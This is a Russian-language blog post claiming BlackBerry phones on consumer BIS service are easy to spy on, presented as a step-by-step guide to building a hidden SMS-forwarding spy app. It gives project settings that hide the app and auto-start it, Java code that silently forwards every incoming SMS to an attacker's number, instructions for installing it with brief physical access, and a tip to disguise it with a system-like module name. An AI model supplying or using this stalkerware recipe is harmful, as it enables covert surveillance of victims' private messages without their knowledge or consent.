Про то, как просто шпионить за пользователями Blackberry

Ходит слух, что Blackberry — это самая безопасная платформа. Вирусы для неё невозможны, пользователи могут расслабиться, потому что существует BES-администратор, который защитит устройства от разных вредоносных программ.

Так-то оно конечно так. BES-архитектура позволяет администратору полностью управлять политиками безопасности на устройстве. Администратор может удалять приложения на Blackberry, которые сочтёт зловредными. Однако, сейчас не всё так радужно. Если раньше Blackberry использовались большими корпорациями для своих сотрудников, то теперь их всё чаще можно увидеть у обычных людей. Это устройства не привязаны к корпоративным BES-серверам. Они используют BIS — Blackberry Internet Service — сервис, предоставляемый оператором. Какие же угрозы могут быть для таких устройств?

Например, очень просто можно сделать SMS-шпиона.

SMS-шпионы сейчас просто заполонили социальные сети (по крайней мере, ВКонтакте и Мой мир) своей навязчивой рекламой. По сути, это обычный лоховской развод, который состоит в том, что вам предлагают ввести номер, с которого вы хотите получить информацию. Мошенники берут с вас два десятка долларов и показывают вам фигу. А вы чего ждали, ведь в правилах таких сервисов белым по белому прописано, что это «шуточный игровой сервис».

На самом деле, без установки агента на телефон жертвы ничего не получится. Приложение-агент должно быть подписано центром сертификации — это правда, но на практике в Blackberry можно обойтись и без этого! Конечно, чтобы получить больше информации — из адресной книги, из e-mail переписки, фотографии с устройства, отслеживание исходящих SMS-сообщений — можно потратить $20 на сертификат. Это не такая уж большая сумма. Для кого-то информация из вашего мобильника стоит этих или даже больших денег. Но заметьте, что мошеннику даже эти деньги не придется платить, чтобы читать входящие SMS  с вашего Blackberry.

Я сейчас докажу, что можно написать SMS-шпиона для Blackberry, не затратив при этом ни цента — только чистый код.

Итак, чтобы написать шпиона требуется:

  • JDE.
  • Доступ к целевому устройству на время от 1 до 5 минут, зависит от расторопности злоумышленника.
  • USB-кабель для установки приложения.

Создаём в JDE новый проект.

Выставляем в свойствах проекта следующие галочки:

  • System module
  • Auto-run on startup

Галочка System module даёт возможность приложению быть незаметным. Приложение не выдаст себя странной иконкой, которая привлечет внимание жертвы.

Галочка Auto-run on startup позволит запустить ваше приложение автоматически без ведома пользователя при перезагрузке. Приложению это необходимо, чтобы в самом начале работы системы развесить «ловушки» для входящих SMS.

Нужно повесить «ловушку» на нулевой порт.

MessageConnection conn =
(MessageConnection) Connector.open("sms://:0");
conn.setMessageListener(this);

В ловушке выполнить простейшую обработку:

Message msg = conn.receive();
msg.setAddress(/** номер телефона, куда отправить полученное сообщение */);
conn.send(msg);

Таким образом, каждое входящее SMS сообщение будет отправлено на номер телефона злоумышленника. При этом, оно также появляется в Blackberry Inbox, так что пользователь ничего не замечает. Его может насторожить только уменьшение баланса, если исходящие SMS у него не бесплатны (есть такие тарифы).

После установки на телефон Blackberry, заходим в Settings > Advanced Options > Applications. В меню выбираем Modules. Ищем имя загруженного модуля. В списке тысячи модулей, а это значит, что можно придумать своему модулю имя, похожее на системное и «не выделяющееся из толпы»: net_rim_sms_forward. В меню выбираем Edit Permissions и выставляем все в Allow. Всё, никаких больше проблем.

Перезагружаем телефон — et voila. Наш демон работает абсолютно незаметно для пользователя.

Запись опубликована в рубрике Uncategorized с метками . Добавьте в закладки постоянную ссылку.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *